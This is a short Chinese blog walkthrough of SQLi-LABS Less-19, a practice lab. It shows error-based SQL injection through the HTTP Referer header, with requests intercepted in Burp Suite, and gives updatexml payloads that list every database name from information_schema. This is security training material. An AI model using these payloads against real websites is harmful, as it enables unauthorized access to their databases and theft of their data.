SQLi LABS Less-19

第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下

 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手

首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer

然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库

1' and updatexml(1,0x7e,1) and '
 

获取所有数据库

  

   

    

     

    
    

     

      1' and updatexml(1,concat(0x7e,substr(
     
    
   

    

     

    
    

     

      (select group_concat(schema_name)
     
    
   

    

     

    
    

     

      from information_schema.schemata)
     
    
   

    

     

    
    

     

      ,1,31)),3) and '
     
    
  
 

文章来源: blog.csdn.net，作者：士别三日wyx，版权归原作者所有，如需转载，请联系作者。

原文链接：blog.csdn.net/wangyuxiang946/article/details/119706248